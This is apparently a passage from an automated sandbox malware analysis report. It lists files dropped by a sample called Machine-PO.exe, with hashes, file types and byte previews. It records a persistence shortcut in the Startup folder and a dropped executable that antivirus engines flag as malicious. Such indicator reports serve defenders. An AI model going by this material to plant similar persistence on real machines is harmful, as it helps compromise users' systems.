                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tzskGLx0pirT740bHexlaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\hDEpHHY.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265532425423776
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                              MD5:30FF218C431F92A5C0A90FB7350B0AFA
                                                                                                              SHA1:1A5A5CAF17A04146E3FCCCBDC5CBD2068D0847FF
                                                                                                              SHA-256:56B71F53C37737B37ECC9836CE61C0CB2355833E7701536C7F36B690CE3528EA
                                                                                                              SHA-512:A5246B8986078307365238F2B527AC4870D231CC7DF3D063DDEA687D39EF23CE3F9653C8308BE4B1ED4E2B8A0030F6EE3A695F0BE16482DA371024550D2D588C
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oibuW_hkI17HJpCCXYtwKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\iAK3LEN.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.26700752367947
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0dBSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+M+pAZewRDK4mW
                                                                                                              MD5:A998C30AA8C6F3664A709801094CE752
                                                                                                              SHA1:D630C2E60B4410087AF0BDA0AEA28B7B3FAAED92
                                                                                                              SHA-256:82352D125722F97A0EFFE3CEA9170FABF7193C7DB520C7C70EA5AAD05961469A
                                                                                                              SHA-512:FF581687DAA211C4E9CDEE9A48A1E6DA77F4376869C04FCCF344903547DCC9E9CC63B67DD6AA48AEE69E581621677FB05A4E13FB86674DD2F16EA82CB44BA376
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L5Yb08FyhoCH-SlAHuVJbA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\k69zQOr.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.257862177020771
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0GXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                              MD5:1876755AF9F400363ECEC607E1D9825E
                                                                                                              SHA1:B060D24055F81907A416FB7DBDF698FAE22F6574
                                                                                                              SHA-256:F2F842BAC8213426A0C965A86977E367C32500367372D092623958451853ABFC
                                                                                                              SHA-512:1971A475BD2E39664E7B09AF0C2371EBDEDA1D577B3E69FD2EDA8D710D737456EFF4EB0DC80CE27967FB274EDD4FAEB670985DCC3BCAE06610903585004BB140
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IKdZHJmWnMymnn-nyViSyg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\m9Zz1oA.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.266848466827146
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                              MD5:3332A41D0E99DA3F4D01639171C4BF7C
                                                                                                              SHA1:14587A3097F270169B529DF37F442C710A71FBF0
                                                                                                              SHA-256:7E06E530A739AB1653378E61A471B3554B5E6FE550A52AE06CEAD19F2C8DF495
                                                                                                              SHA-512:E883DD167A6715B89EFAEFE1BC9C0FB979870E22AAA0B559EC97931029BD55B7354A43B0BEEEDC3ADF35AE20EA00CC2343C9733D6ADDFCB6CAF9AB2D9CF24EC0
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FV-QYT6fMZa8-EGYhmfebQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\tN4sF9u.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.266060521671507
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                              MD5:52EE9F251C252E62869855F3E94DC0FC
                                                                                                              SHA1:EF3B3CC5D6E41290A5FD7DF4E1FC33C9A84E0A74
                                                                                                              SHA-256:C345727E1BE744FCCC1E9255EDBEA182C78D996459DB4B94FCD9028E3A761C01
                                                                                                              SHA-512:78A2125E9C47CE42EC7761C66539F21C724EB5CC719B26FBD87C0EBFC8075B37D492B13C637E59482621D9DCF3D053B5A3AB23D31AC3BD565CF3D2E569D83438
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ppL64n5NZ1WBGTsLRO4evA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\uoFmDxR.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.278804614939333
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                              MD5:B3F0A3F414EB57B393ABD775DE664BAF
                                                                                                              SHA1:AF201A239629A49E64CCA0D8043E33319AE7519E
                                                                                                              SHA-256:C9A4BB8AA535D6888E685B4C4D9C37E1291F6D55880847019010A66F36AAB7A4
                                                                                                              SHA-512:02B47C0A3FA88213741DF51C8114025F1F2B2E42AC997279D6D5616CBFF9FE47FDDD7A74DDB1833217D5436952A067D4F56AF1BB8E7A7F639D4FBA5588E6CEC4
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5cBjJI_Fh3zfqYWF3YVtRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\vOtT9th.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265023550665354
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0EdSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                              MD5:AC6AE1F7FA485A3237C6359D51458963
                                                                                                              SHA1:C1880CEAFE99955BF7A7CB17400191EAEADC24FE
                                                                                                              SHA-256:D1F88DEB8080BB779E5F49D61B33F271669A6911C3E9DA2D3AD785475365F30D
                                                                                                              SHA-512:8EA9CC8D4E60B47D06CC3D3E1070EBDAB1E7720632C03929676CE0824D4AE799FA8BE69ECB90F17F4542770D89764F58BA276EAFA7CE571F96E951B03307154F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OpYsUxHV9Re1Fkj1dAgDGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\xLVXn71.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.280352182197388
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                                              MD5:C7ACB509FD30AAA61340A92270F228BF
                                                                                                              SHA1:90CEFE9029A767B86A5FAD516B83B735FDE4D4D2
                                                                                                              SHA-256:556D558A98A047038D8B58ADF03981EA892345C2ECBC8279588160BB30233CE5
                                                                                                              SHA-512:2A1C8EF1C63D03C5361189AFF988E0CA6C1888333B74F4184CAB52C16D2412CC734F2026DE0A4D8997120F9F554C6B4A8C5C25D5A335A008FC030B8F9AF7F202
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KjFIOS564AwKyjIAtu9CqA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\yiaDGZP.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.264974102821585
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+04h3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z3+pAZewRDK4mW
                                                                                                              MD5:9A7B99A26F8470BB89E6E53317BCECC8
                                                                                                              SHA1:6E7EFB055CA9FF42BA768AA9D85A83B40F463CED
                                                                                                              SHA-256:431138BD606FDA76A1CA5654D949E69E0899B4F02ED5B67350463456BCD579AD
                                                                                                              SHA-512:568733DC2819A1C19DF5381930A0C016CB3813DD7A6BEA19C08741FE4A8A48646E79C3B75DD2BDEB31FCBECDE0FB4B173D3583AE0A0AFD6296D14A05CC8F9126
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oLi-S9UJIqotNrJO_HyLxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\ymylyAK.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261394564221904
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0VGGzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                              MD5:26374D0D4940B7696E19EE1A7E0D3476
                                                                                                              SHA1:349C3396FA8C48106FD83611CE3A5A52D386769A
                                                                                                              SHA-256:8666965261F9E6B264A052304577BF77960CDF8EA9E47A6277EB203A75AAA34D
                                                                                                              SHA-512:A64C5BF3C3B2FF719E50CDE13B19F2502FBBF67A557D5293774D8DC1CB4F324D4390E561BF48136ED599AB1F71FCA677975EF2649C8F60C0BDB56F7E896BAE86
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1Ok25HVJDw7ntccb1v7PGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\zstTfPJ.ini

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256084589733454
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                              MD5:709DAD2E7EEAB92801D3CE8D73A04B64
                                                                                                              SHA1:65EC956139AD7FFF15B8D68BF51E4E18ABA116A5
                                                                                                              SHA-256:75E63450D338358F26617C89DB787E97FB32BE3D68D77D1D34FF52A44F602BE4
                                                                                                              SHA-512:C0C2B7989821173ABAF623E5A87062362AA22EEED7538490CEFD92F266694C92FD4A014B97E79B210A0A88780ED16FF85BBE3AC2DF10F56D709676C3D3BF2FFD
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HkaRyhn4ZBX2OxKyge1E1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                              C:\Users\user\AppData\Local\Temp\~$GZrLyJhZ.xlsm

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):165
                                                                                                              Entropy (8bit):1.5231029153786204
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:WH25nJFV:WH2/
                                                                                                              MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                              SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                              SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                              SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                              Malicious:false
                                                                                                              Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                              C:\Users\user\AppData\Local\Temp\~DFD7679C615D1C67F0.TMP

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32768
                                                                                                              Entropy (8bit):3.746897789531007
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                              MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                              SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                              SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                              SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\._cache_Machine-PO.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:25:12 2024, mtime=Mon Dec 30 09:25:12 2024, atime=Mon Dec 30 09:25:12 2024, length=1436672, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1808
                                                                                                              Entropy (8bit):3.418064229045134
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:87RwO4WeEM0XQA1U8E2+s9T4Il1IeOIeSm:87RwmxM03Nr9MIlXO9S
                                                                                                              MD5:09B043739983D4467E641BBF6ED90D8C
                                                                                                              SHA1:A2A84AE77B7C13A07E1C42686BA50E6DEA77DD75
                                                                                                              SHA-256:651FF3510AAEEF54972E1C629826E14E96339D97C274C8BB4455F06ACD37AA19
                                                                                                              SHA-512:10EF9DFC95B064A3914B2575CC729167BA09725728A703E1065528BFB5B58032547B6C58D2377BDDB808217BB191F922EBA3450FF0354EE306C7D8EA6EF4A402
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...BE...Z....O..Z....O..Z............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...|....Z.......Z......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y$S..........................d...A.p.p.D.a.t.a...B.V.1......Y"S..Roaming.@......EW)B.Y"S........................../...R.o.a.m.i.n.g.....V.1......Y&S..Windata.@......Y&S.Y&S....*.........................W.i.n.d.a.t.a.....`.2......Y'S .TCPKPY.exe..F......Y'S.Y'S..........................$..T.C.P.K.P.Y...e.x.e.......a...............-.......`..................C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.T.C.P.K.P.Y...e.x.e.*.".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll............................................................................................................

                                                                                                              C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\._cache_Machine-PO.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1436672
                                                                                                              Entropy (8bit):7.208680290347871
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                              MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                              SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                              SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                              SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..........(.......k............@..........................P............@...@.......@.....................lk..|....@...V...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....V...@...X..................@..@.reloc..b............F..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\Desktop\._cache_Machine-PO.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\Machine-PO.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1436672
                                                                                                              Entropy (8bit):7.208680290347871
                                                                                                              Encrypted:false
